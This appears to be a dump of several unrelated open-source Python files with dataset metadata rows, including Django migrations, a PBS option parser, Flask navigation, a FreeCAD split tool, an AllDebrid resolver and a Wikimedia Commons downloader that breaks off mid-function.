if self.name is None:
return "", "", []
if self.operator == "exists":
return self._apply_exists(parsed_ether)
if self.operator == "doesntexist":
return self._apply_doesntexist(parsed_ether)
elif self.operator == "|":
return self._apply_span_equals_number(parsed_ether)
elif self.operator == "~":
return self._apply_regex(parsed_ether)
elif self.operator == ">":
return self._apply_subspan(parsed_ether)
elif self.operator == "=":
return self._apply_equal_span_length(parsed_ether)
elif self.operator == "==":
return self._apply_equal_span_length_and_content(parsed_ether)
else:
raise Exception("Unknown EtherCalc validation operator: '" + str(self.operator) + "'")
def applies(self, doc_name, doc_corpus):
if self.corpus is not None and re.search(self.corpus, doc_corpus) is None:
return False
if self.doc is not None and re.search(self.doc, doc_name) is None:
return False
return True
def validate(self, parsed_ether):
report, tooltip, cells = self._apply_rule(parsed_ether)
return {"report": report,
"tooltip": tooltip,
"cells": cells}
| apache-2.0 | 6,834,000,973,809,227,000 | 40.783951 | 117 | 0.503989 | false | 4.205654 | false | false | false |
oj-development/oj-web | oj_core/migrations/0009_auto_20150902_0258.py | 1 | 1147 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('oj_core', '0008_userstatus_solved_problems'),
]
operations = [
migrations.AlterField(
model_name='status',
name='memory',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='result',
field=models.PositiveSmallIntegerField(default=10),
),
migrations.AlterField(
model_name='status',
name='score',
field=models.PositiveSmallIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='time',
field=models.FloatField(default=0),
),
migrations.AlterField(
model_name='status',
name='user',
field=models.ForeignKey(to='oj_core.UserStatus', null=True, on_delete=django.db.models.deletion.SET_NULL),
),
]
| mit | -4,211,019,953,965,281,000 | 27.675 | 118 | 0.569311 | false | 4.551587 | false | false | false |
arlolra/exitaddr | server.py | 1 | 2010 | #!/usr/bin/env python
import json
from twisted.web import server, resource
from twisted.internet import reactor
from common import Exitaddr, options
DEFAULT_PORT = 8080
exitaddr_results = None
def addHeader(request):
h = request.responseHeaders
h.addRawHeader(b"content-type", b"application/json")
class Res(resource.Resource):
def getChild(self, name, request):
''' handle trailing / '''
if name == '':
return self
return resource.Resource.getChild(self, name, request)
class Exits(Res):
''' json dump of our state '''
def render_GET(self, request):
addHeader(request)
return json.dumps(exitaddr_results, indent=4)
class IP(Res):
''' json response with the remote host ip '''
def render_GET(self, request):
host = request.transport.getPeer().host
header = request.received_headers.get("X-Forwared-For", None)
if header is not None:
host = header.split(',')[-1].strip()
response = {"IP": host}
addHeader(request)
return json.dumps(response, indent=4)
class Ser(Exitaddr):
def __init__(self, *args, **kwargs):
Exitaddr.__init__(self, *args, **kwargs)
self.fld = 0
def passed(self, result):
pass
def failed(self, result):
print result[0].id_hex[1:], "failed"
self.fld += 1
def finished(self, results):
global exitaddr_results
res = {}
for key in results.keys():
res[key] = results[key][1]
exitaddr_results = res
print ""
print "failed", self.fld
print "exit list ready!"
def main():
root = resource.Resource()
root.putChild("exits", Exits())
root.putChild("ip", IP())
reactor.listenTCP(DEFAULT_PORT, server.Site(root))
# sample a few for now
options.num_exits = 25
exitaddr = Ser(reactor, options)
print "listening on", DEFAULT_PORT
exitaddr.start()
if __name__ == "__main__":
main()
| mit | -9,052,537,412,710,313,000 | 22.647059 | 69 | 0.604478 | false | 3.764045 | false | false | false |
macressler/vsc-tools-lib | lib/vsc/pbs/option_parser.py | 1 | 9482 | #!/usr/bin/env python
'''class for parsing PBS options'''
from argparse import ArgumentParser
import os, re, validate_email
from vsc.event_logger import EventLogger
from vsc.utils import walltime2seconds, size2bytes
from vsc.utils import InvalidWalltimeError
class PbsOptionParser(EventLogger):
'''Parser for PBS options, either command line or directives'''
def __init__(self, config, event_defs, job):
'''constructor'''
super(PbsOptionParser, self).__init__(event_defs, 'global')
self._config = config
self._job = job
self._arg_parser = ArgumentParser()
self._arg_parser.add_argument('-A')
self._arg_parser.add_argument('-e')
self._arg_parser.add_argument('-j')
self._arg_parser.add_argument('-k')
self._arg_parser.add_argument('-l', action='append')
self._arg_parser.add_argument('-m')
self._arg_parser.add_argument('-M')
self._arg_parser.add_argument('-N')
self._arg_parser.add_argument('-o')
self._arg_parser.add_argument('-q')
def parse_args(self, option_line):
'''parse options string'''
self._events = []
args = option_line.split()
options, rest = self._arg_parser.parse_known_args(args)
for option, value in options.__dict__.items():
if value:
self.handle_option(option, value)
if self._job.queue and not self._job._is_time_limit_set:
walltime_limit = self.get_queue_limit(self._job.queue)
if walltime_limit:
self._job._resource_specs['walltime'] = walltime_limit
def handle_option(self, option, value):
'''option dispatch method'''
if option == 'A':
self.check_A(value.strip())
elif option == 'e' or option == 'o':
self.check_oe(value.strip(), option)
elif option == 'j':
self.check_j(value.strip())
elif option == 'k':
self.check_k(value.strip())
elif option == 'l':
self.check_l(value)
elif option == 'm':
self.check_m(value.strip())
elif option == 'M':
self.check_M(value.strip())
elif option == 'N':
self.check_N(value.strip())
elif option == 'q':
self.check_q(value.strip())
def check_A(self, val):
'''check whether a valid project name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.project = val
else:
self.reg_event('invalid_project_name', {'val': val})
def get_queue_limit(self, queue_name):
'''get the maximum walltime for the queue specified'''
for queue_def in self._config['queue_definitions']:
if queue_def['name'] == queue_name:
return int(queue_def['walltime_limit'])
return None
def check_q(self, val):
'''check whether a valid queue name was specified'''
if re.match(r'[A-Za-z]\w*$', val):
self._job.queue = val
else:
self.reg_event('invalid_queue_name', {'val': val})
def check_j(self, val):
'''check -j option, vals can be oe, eo, n'''
if val == 'oe' or val == 'eo' or val == 'n':
self._job.join = val
else:
self.reg_event('invalid_join', {'val': val})
def check_k(self, val):
'''check -k option, val can be e, o, oe, eo, or n'''
if re.match(r'^[eo]+$', val) or val == 'n':
self._job.keep = val
else:
self.reg_event('invalid_keep', {'val': val})
def check_m(self, val):
'''check -m option, val can be any combination of b, e, a, or n'''
if re.match(r'^[bea]+$', val) or val == 'n':
self._job.mail_events = val
else:
self.reg_event('invalid_mail_event', {'val': val})
def check_M(self, val):
'''check -M option'''
self._job.mail_addresses = val.split(',')
uid = os.getlogin()
for address in self._job.mail_addresses:
if (not validate_email.validate_email(address) and
address != uid):
self.reg_event('invalid_mail_address', {'address': address})
def check_N(self, val):
'''check -N is a valid job name'''
if re.match(r'[A-Za-z]\w{,14}$', val):
self._job.name = val
else:
self.reg_event('invalid_job_name', {'val': val})
def check_time_res(self, val, resource_spec):
'''check a time resource'''
attr_name, attr_value = val.split('=')
try:
seconds = walltime2seconds(attr_value)
resource_spec[attr_name] = seconds
except InvalidWalltimeError:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'time': attr_value})
def check_generic_res(self, val, resource_spec):
'''check a generic resource'''
attr_name, attr_value = val.split('=')
if attr_name == 'feature':
resource_spec[attr_name] = attr_value.split(':')
else:
resource_spec[attr_name] = attr_value
def check_mem_res(self, val, resource_spec):
'''check memory resource'''
attr_name, attr_value = val.split('=')
match = re.match(r'(\d+)([kmgt])?[bw]', attr_value)
if match:
amount = int(match.group(1))
order = match.group(2)
resource_spec[attr_name] = size2bytes(amount, order)
else:
self.reg_event('invalid_{0}_format'.format(attr_name),
{'size': attr_value})
def check_nodes_res(self, val, resource_spec):
'''check nodes resource'''
_, attr_value = val.split('=', 1)
# if present, multiple node specifications are separated by '+'
node_spec_strs = attr_value.split('+')
node_specs = []
for node_spec_str in node_spec_strs:
node_spec = {'features': []}
spec_strs = node_spec_str.split(':')
# if a node spec starts with a number, that's the number of nodes,
# otherwise it can be a hostname or a feature, but number of nodes is 1
if spec_strs[0].isdigit():
node_spec['nodes'] = int(spec_strs[0])
else:
node_spec['nodes'] = 1
# note that this might be wrong, it may actually be a feature, but
# that is a semantic check, not syntax
node_spec['host'] = spec_strs[0]
# now deal with the remaining specifications, ppn, gpus and features
for spec_str in spec_strs[1:]:
if (spec_str.startswith('ppn=') or
spec_str.startswith('gpus=')):
key, value = spec_str.split('=')
if value.isdigit():
node_spec[key] = int(value)
else:
self.reg_event('{0}_no_number'.format(key),
{'number': value})
else:
node_spec['features'].append(spec_str)
node_specs.append(node_spec)
resource_spec['nodes'] = node_specs
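    # Illustrative parse (an assumption mirroring the branches above): the
    # value "nodes=2:ppn=4:gpus=1:sandybridge+gligar01:ppn=2" would produce
    #   resource_spec['nodes'] == [
    #       {'nodes': 2, 'ppn': 4, 'gpus': 1, 'features': ['sandybridge']},
    #       {'nodes': 1, 'host': 'gligar01', 'ppn': 2, 'features': []}]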
def check_procs_res(self, val, resource_spec):
'''check procs resource specification'''
attr_name, attr_value = val.split('=')
if attr_name in resource_spec:
self.reg_event('multiple_procs_specs')
if not attr_value.isdigit():
self.reg_event('non_integer_procs', {'procs': attr_value})
resource_spec[attr_name] = int(attr_value)
def check_l(self, vals):
'''check and handle resource options'''
resource_spec = {}
has_default_pmem = True
# there can be multiple -l options on one line or on the command line
for val_str in (x.strip() for x in vals):
# values can be combined by using ','
for val in (x.strip() for x in val_str.split(',')):
if (val.startswith('walltime=') or
val.startswith('cput=') or
val.startswith('pcput=')):
self.check_time_res(val, resource_spec)
self._job._is_time_limit_set = True
elif (val.startswith('mem=') or val.startswith('pmem=') or
val.startswith('vmem=') or val.startswith('pvmem=')):
self.check_mem_res(val, resource_spec)
if val.startswith('pmem='):
has_default_pmem = False
elif val.startswith('nodes='):
self.check_nodes_res(val, resource_spec)
elif val.startswith('procs='):
self.check_procs_res(val, resource_spec)
elif (val.startswith('partition=') or
val.startswith('feature') or
val.startswith('qos')):
self.check_generic_res(val, resource_spec)
else:
self.reg_event('unknown_resource_spec', {'spec': val})
self._job.add_resource_specs(resource_spec)
self._job._has_default_pmem = has_default_pmem
def check_oe(self, val, option):
'''check for valid -o or -e paths'''
if ':' in val:
host, path = val.split(':', 1)
else:
host = None
path = val
if option == 'e':
self._job.set_error(path, host)
else:
self._job.set_output(path, host)
| lgpl-3.0 | 2,629,034,364,437,918,000 | 38.840336 | 76 | 0.531955 | false | 3.902058 | false | false | false |
macalik/TITDev | views/navigation.py | 2 | 7793 | import json
from hashlib import sha1
from flask_nav import Nav
from flask_nav.elements import Navbar, View, Subgroup, Link, Text
from flask_bootstrap.nav import BootstrapRenderer
from flask import session, url_for
from dominate import tags
class LinkTab(Link):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class LogIn(View):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class SeparatorAlign(Text):
def __init__(self):
super().__init__("")
class Navigation:
with open("configs/base.json", "r") as base_config_file:
base_config = json.load(base_config_file)
base = ['TiT', View('Home', 'home'), View('Account', "account.home")]
services = [View('JF Service', "jf.home"), View('Buyback Service', 'buyback.home'),
View('Fittings', "fittings.home"), View("Market Service", "ordering.home")]
settings = [SeparatorAlign(), View("Bug Report", 'issues'), View("Change Theme", "settings"),
View('Log Out', 'auth.log_out')]
alliance = base + services
corp = base + [Subgroup("Corporation", View('Corp Main', "corp.home"),
LinkTab("Corp Forums", base_config["forum_url"])),
Subgroup("Services", *services)]
def __init__(self, app):
nav = Nav()
# noinspection PyUnusedLocal,PyAbstractClass,PyMethodMayBeStatic,PyPep8Naming
@nav.renderer('custom')
class CustomRenderer(BootstrapRenderer):
# External links now open in new tab
def visit_LinkTab(self, node):
item = tags.li()
item.add(tags.a(node.text, href=node.get_url(), target="_blank"))
return item
def visit_LogIn(self, node):
item = tags.li()
inner = item.add(tags.a(href=node.get_url(), _class="nav-image"))
inner.add(tags.img(src=url_for("static", filename="sso_login.png")))
if node.active:
item['class'] = 'active'
return item
            def visit_SeparatorAlign(self, node):
                # never called: visit_Navbar consumes SeparatorAlign items
                # itself, using them only as an alignment marker
                raise NotImplementedError
def visit_Navbar(self, node):
# create a navbar id that is somewhat fixed, but do not leak any
# information about memory contents to the outside
node_id = self.id or sha1(str(id(node)).encode()).hexdigest()
root = tags.nav() if self.html5 else tags.div(role='navigation')
root['class'] = 'navbar navbar-default'
cont = root.add(tags.div(_class='container-fluid'))
# collapse button
header = cont.add(tags.div(_class='navbar-header'))
btn = header.add(tags.button())
btn['type'] = 'button'
btn['class'] = 'navbar-toggle collapsed'
btn['data-toggle'] = 'collapse'
btn['data-target'] = '#' + node_id
btn['aria-expanded'] = 'false'
btn['aria-controls'] = 'navbar'
btn.add(tags.span('Toggle navigation', _class='sr-only'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
# title may also have a 'get_url()' method, in which case we render
# a brand-link
if node.title is not None:
if hasattr(node.title, 'get_url'):
header.add(tags.a(node.title.text, _class='navbar-brand',
href=node.title.get_url()))
else:
header.add(tags.span(node.title, _class='navbar-brand'))
bar = cont.add(tags.div(
_class='navbar-collapse collapse',
id=node_id,
))
bar_list = bar.add(tags.ul(_class='nav navbar-nav'))
bar_list_right = bar.add(tags.ul(_class='nav navbar-nav navbar-right'))
to_right = False
for item in node.items:
if isinstance(item, SeparatorAlign):
to_right = True
continue
if not to_right:
bar_list.add(self.visit(item))
else:
bar_list_right.add(self.visit(item))
return root
@nav.navigation('anon')
def nav_anon():
return Navbar('TiT', View('Home', 'home'),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), LogIn('Log In', 'auth.sso_redirect'))
@nav.navigation('neut')
def nav_neut():
return Navbar('TiT', View('Home', 'home'), View('Account', "account.home"),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), View('Log Out', 'auth.log_out'))
@nav.navigation('corporation')
def nav_corp():
items = Navigation.corp + Navigation.settings
return Navbar(*items)
@nav.navigation('alliance')
def nav_alliance():
items = Navigation.alliance + Navigation.settings
return Navbar(*items)
@nav.navigation('admin')
def nav_admin():
admin_elements = []
role_elements = []
market_service = False
security = False
for role in session.get("UI_Roles"):
if role == "jf_admin":
admin_elements += [View('JF Routes', "jf.admin"), View('JF Stats', "jf.stats")]
elif role == "user_admin":
admin_elements.append(View('User Roles', "admin.roles"))
elif role == "jf_pilot":
role_elements.append(View('JF Service', "jf.pilot"))
elif role == "buyback_admin":
admin_elements.append(View('Buyback Service', 'buyback.admin'))
elif role in ["ordering_marketeer", "ordering_admin"] and not market_service:
role_elements.append(View('Market Service', 'ordering.admin'))
market_service = True
elif role in ["security_officer", "recruiter"] and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
if role == "security_officer":
role_elements.append(View('Security Info', 'security.home'))
admin_elements.append(View('Recruitment Settings', 'recruitment.admin'))
security = True
elif role == "recruiter" and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
subs = []
if role_elements:
subs.append(Subgroup('Role Pages', *role_elements))
if admin_elements:
subs.append(Subgroup('Admin Pages', *admin_elements))
if session["UI_Corporation"]:
items = Navigation.corp + subs + Navigation.settings
elif session["UI_Alliance"]:
items = Navigation.alliance + subs + Navigation.settings
else:
return nav_neut()
return Navbar(*items)
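        # Hedged template note: flask-nav exposes the bars registered above to
        # Jinja through the `nav` global, so a base template would typically
        # render the active one with something like
        #   {{ nav.corporation.render(renderer='custom') }}
        # (the exact render() signature depends on the flask-nav version).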
nav.init_app(app)
| mit | -4,933,823,219,203,500,000 | 41.584699 | 115 | 0.519954 | false | 4.207883 | false | false | false |
Fat-Zer/FreeCAD_sf_master | src/Mod/Draft/draftguitools/gui_split.py | 3 | 4997 | # ***************************************************************************
# * (c) 2009, 2010 Yorik van Havre <yorik@uncreated.net> *
# * (c) 2009, 2010 Ken Cline <cline@frii.com> *
# * (c) 2020 Eliud Cabrera Castillo <e.cabrera-castillo@tum.de> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * FreeCAD is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with FreeCAD; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides GUI tools to split line and wire objects."""
## @package gui_split
# \ingroup draftguitools
# \brief Provides GUI tools to split line and wire objects.
## \addtogroup draftguitools
# @{
from PySide.QtCore import QT_TRANSLATE_NOOP
import FreeCAD as App
import FreeCADGui as Gui
import Draft_rc
import DraftVecUtils
import draftguitools.gui_base_original as gui_base_original
import draftguitools.gui_tool_utils as gui_tool_utils
from draftutils.messages import _msg
from draftutils.translate import translate
# The module is used to prevent complaints from code checkers (flake8)
True if Draft_rc.__name__ else False
class Split(gui_base_original.Modifier):
"""Gui Command for the Split tool."""
def GetResources(self):
"""Set icon, menu and tooltip."""
return {'Pixmap': 'Draft_Split',
'Accel': "S, P",
'MenuText': QT_TRANSLATE_NOOP("Draft_Split", "Split"),
'ToolTip': QT_TRANSLATE_NOOP("Draft_Split", "Splits the selected line or polyline into two independent lines\nor polylines by clicking anywhere along the original object.\nIt works best when choosing a point on a straight segment and not a corner vertex.")}
def Activated(self):
"""Execute when the command is called."""
super(Split, self).Activated(name=translate("draft","Split"))
if not self.ui:
return
_msg(translate("draft", "Click anywhere on a line to split it."))
self.call = self.view.addEventCallback("SoEvent", self.action)
def action(self, arg):
"""Handle the 3D scene events.
This is installed as an EventCallback in the Inventor view.
Parameters
----------
arg: dict
Dictionary with strings that indicates the type of event received
from the 3D view.
"""
if arg["Type"] == "SoKeyboardEvent":
if arg["Key"] == "ESCAPE":
self.finish()
elif arg["Type"] == "SoLocation2Event":
gui_tool_utils.getPoint(self, arg)
gui_tool_utils.redraw3DView()
elif (arg["Type"] == "SoMouseButtonEvent"
and arg["Button"] == "BUTTON1"
and arg["State"] == "DOWN"):
self.point, ctrlPoint, info = gui_tool_utils.getPoint(self, arg)
if "Edge" in info["Component"]:
return self.proceed(info)
def proceed(self, info):
"""Proceed with execution of the command after click on an edge."""
wire = App.ActiveDocument.getObject(info["Object"])
edge_index = int(info["Component"][4:])
Gui.addModule("Draft")
_cmd = "Draft.split"
_cmd += "("
_cmd += "FreeCAD.ActiveDocument." + wire.Name + ", "
_cmd += DraftVecUtils.toString(self.point) + ", "
_cmd += str(edge_index)
_cmd += ")"
_cmd_list = ["s = " + _cmd,
"FreeCAD.ActiveDocument.recompute()"]
self.commit(translate("draft", "Split line"),
_cmd_list)
self.finish()
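# Usage sketch (assumption): once registered below, the command can also be
# triggered from the FreeCAD Python console with
#   Gui.runCommand('Draft_Split')
# which behaves like pressing the toolbar button.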
Gui.addCommand('Draft_Split', Split())
## @}
| lgpl-2.1 | 2,060,247,133,012,958,500 | 42.833333 | 273 | 0.528117 | false | 4.27094 | false | false | false |
Tooskich/python_core | rankings/management/commands/updateraces.py | 1 | 1785 | #-*- coding: utf-8 -*-
import os
import shutil
from django.core.management.base import BaseCommand, CommandError
# CURRENT_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
# BACKEND_DIR = os.path.abspath(os.path.join(CURRENT_DIR, os.pardir))
# APP_DIR = os.path.abspath(os.path.join(BACKEND_DIR, os.pardir))
# WEBAPPS_DIR = os.path.abspath(os.path.join(APP_DIR, os.pardir))
# For production:
CURRENT_DIR = '/home/tooski/webapps/python_core/python_core/rankings/'
BACKEND_DIR = '/home/tooski/webapps/python_core/python_core/'
APP_DIR = '/home/tooski/webapps/python_core/'
WEBAPPS_DIR = '/home/tooski/webapps/'
# For dev:
# CURRENT_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/rankings/'
# BACKEND_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/'
# APP_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
# WEBAPPS_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
class Command(BaseCommand):
args = 'None'
help = 'Updates the table to the latest races, directly scrapped from the FIS website.'
def handle(self, *args, **options):
os.system('rm ' + WEBAPPS_DIR + 'website/ranking.json')
os.system('rm ' + CURRENT_DIR + 'fis/ranking.json')
# We get the leaderboard rankings and move them to the Apache server:
os.system('cd ' + CURRENT_DIR +
'/fis/ && scrapy crawl ranking -o ranking.json -t json')
# Testing:
shutil.copy(CURRENT_DIR + 'fis/ranking.json',
WEBAPPS_DIR + 'website/ranking.json')
# Server
# shutil.copy(CURRENT_DIR + '/fis/ranking.json',
# WEBAPPS_DIR + '/website/ranking.json')
# We should use the pipeline system of scrapy with the races.
os.system('cd ' + CURRENT_DIR + '/fis/ && scrapy crawl races')
| apache-2.0 | 1,120,057,887,100,004,500 | 40.511628 | 91 | 0.658263 | false | 3.010118 | false | false | false |
smysnk/sikuli-framework | src/robotframework/common/Selenium2Server.py | 2 | 2234 | """
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from core.lib.robotremoteserver import RobotRemoteServer
import bootstrap
from entities import *
import os
import sys
import subprocess
import platform
from log import Logger
class Selenium:
vmrunPath = None
log = Logger()
def __init__(self):
"""Also this doc should be in shown in library doc."""
def start(self):
        # keep a handle on the Selenium server process so it can be inspected
        # or terminated later instead of discarding the Popen object
        self.process = subprocess.Popen(['java', '-jar', 'java/selenium-server-standalone-2.21.0.jar'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if __name__ == '__main__':
#RobotRemoteServer(Selenium(), *sys.argv[1:])
s = Selenium()
s.start() | bsd-3-clause | -7,281,574,944,637,975,000 | 36.551724 | 140 | 0.740376 | false | 4.329457 | false | false | false |
maferelo/saleor | saleor/webhook/migrations/0001_initial.py | 2 | 2186 | # Generated by Django 2.2.4 on 2019-09-26 05:47
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [("account", "0033_serviceaccount")]
operations = [
migrations.CreateModel(
name="Webhook",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("target_url", models.URLField(max_length=255)),
("is_active", models.BooleanField(default=True)),
("secret_key", models.CharField(blank=True, max_length=255, null=True)),
(
"service_account",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="webhooks",
to="account.ServiceAccount",
),
),
],
options={"permissions": (("manage_webhooks", "Manage webhooks"),)},
),
migrations.CreateModel(
name="WebhookEvent",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"event_type",
models.CharField(
db_index=True, max_length=128, verbose_name="Event type"
),
),
(
"webhook",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="events",
to="webhook.Webhook",
),
),
],
),
]
| bsd-3-clause | 366,458,658,504,562,050 | 31.147059 | 88 | 0.390668 | false | 5.619537 | false | false | false |
superberny70/pelisalacarta | python/main-classic/servers/debriders/alldebrid.py | 2 | 1902 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Connector for AllDebrid
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
from core import jsontools
from core import logger
from core import scrapertools
# Returns an array of possible video url's from the page_url
def get_video_url(page_url, premium=False, user="", password="", video_password=""):
logger.info("(page_url='%s' , user='%s' , password='%s', video_password=%s)" % (
page_url, user, "**************************"[0:len(password)], video_password))
page_url = correct_url(page_url)
url = 'http://www.alldebrid.com/service.php?pseudo=%s&password=%s&link=%s&nb=0&json=true&pw=' % (
user, password, page_url)
data = jsontools.load_json(scrapertools.downloadpage(url))
video_urls = []
if data and data["link"] and not data["error"]:
extension = ".%s [alldebrid]" % data["filename"].rsplit(".", 1)[1]
video_urls.append([extension, data["link"]])
else:
try:
server_error = "Alldebrid: " + data["error"].decode("utf-8", "ignore")
server_error = server_error.replace("This link isn't available on the hoster website.",
"Enlace no disponible en el servidor de descarga") \
.replace("Hoster unsupported or under maintenance.",
"Servidor no soportado o en mantenimiento")
except:
server_error = "Alldebrid: Error en el usuario/password o en la web"
video_urls.append([server_error, ''])
return video_urls
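# Illustrative return values (assumed shapes, following the branches above):
#   success -> [[".mp4 [alldebrid]", "http://<direct-download-link>"]]
#   failure -> [["Alldebrid: <error message>", '']]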
def correct_url(url):
if "userporn.com" in url:
url = url.replace("/e/", "/video/")
if "putlocker" in url:
url = url.replace("/embed/", "/file/")
return url
| gpl-3.0 | -320,637,137,450,492,500 | 37.04 | 101 | 0.557308 | false | 3.729412 | false | false | false |
wavesaudio/instl | pyinstl/installItemGraph.py | 1 | 1347 | #!/usr/bin/env python3.9
import utils
from configVar import config_vars
try:
import networkx as nx
except ImportError as IE:
raise IE
def create_dependencies_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "depends"):
retVal.add_edge(iid, dependant)
return retVal
def create_inheritItem_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "inherit"):
retVal.add_edge(iid, dependant)
return retVal
def find_cycles(item_graph):
retVal = nx.simple_cycles(item_graph)
return retVal
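# Minimal illustration (hypothetical data) of the helpers in this module:
#   g = nx.DiGraph()
#   g.add_edge("APP", "COMMON_LIB")      # APP depends on COMMON_LIB
#   g.add_edge("PLUGIN", "COMMON_LIB")
#   list(find_cycles(g))                 # -> [] (no dependency cycles)
#   find_leaves(g)                       # -> ["COMMON_LIB"]
#   find_needed_by(g, "COMMON_LIB")      # -> APP and PLUGIN (order may vary)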
def find_leaves(item_graph):
retVal = list()
for node in sorted(item_graph):
        # networkx 2.x returns an iterator from neighbors(), which is always
        # truthy; materialise it so the emptiness check actually works
        the_neighbors = list(item_graph.neighbors(node))
        if not the_neighbors:
retVal.append(node)
return retVal
def find_needed_by(item_graph, node):
retVal = utils.set_with_order()
if node in item_graph:
predecessors = item_graph.predecessors(node)
for predecessor in predecessors:
if predecessor not in retVal:
retVal.append(predecessor)
retVal.extend(find_needed_by(item_graph, predecessor))
return retVal
| bsd-3-clause | 366,352,157,756,994,600 | 25.94 | 82 | 0.6585 | false | 3.544737 | false | false | false |
MartinThoma/algorithms | wiki-images-catpage/wikicommons.py | 1 | 8526 | #!/usr/bin/env python
"""Get all images of a wikipedia commons category."""
import json
import logging
import os
import sys
import urllib # images
import urllib2 # text
import xmltodict
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def create_filelist(category):
"""
Create a list of files in a category.
Parameters
----------
category : string
Returns
-------
list
Examples
--------
>> wikicommons.create_filelist('Category:Unidentified Convolvulaceae')
"""
filelist = []
cats_to_explore = [category]
catsub = len("Category:")
visited_categories = []
while len(cats_to_explore) > 0:
sub_cat = cats_to_explore.pop() # Get next category
sub_filelist = get_direct_files(sub_cat) # Get direct members
for el in sub_filelist:
entry = {'filename': el['filename'],
'status': 'registered',
'category': os.path.join(category[catsub:],
el['category'][catsub:])}
filelist.append(entry)
# get subcategories
sub_categories = get_subcategories(sub_cat)
for el in sub_categories:
if el not in visited_categories:
cats_to_explore.append(el)
else:
logging.warning("Double category (%s)", sub_cat)
visited_categories.append(sub_cat)
logging.info("Done with sub_category '%s' (%i files), %i remaining",
sub_cat,
len(sub_filelist),
len(cats_to_explore))
return filelist
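# Shape of one filelist entry produced above (for illustration):
#   {'filename': u'Some_flower.jpg',
#    'status': 'registered',
#    'category': u'Unidentified Convolvulaceae/Some subcategory'}
# download_filelist() later flips 'status' to 'downloaded'.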
def download_filelist(category, file_path, pixels):
"""Download all files in filelist."""
if os.path.isfile(file_path):
with open(file_path) as data_file:
filelist = json.load(data_file)
else:
# File does not exist right now. Get data and create it.
logging.info("No file '%s' found. Get data.", file_path)
filelist = create_filelist(category)
logging.info("Got data for category '%s'. Write it to '%s'",
category,
file_path)
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info("The category '%s' has %i images.",
category,
len(filelist))
# Now load the images
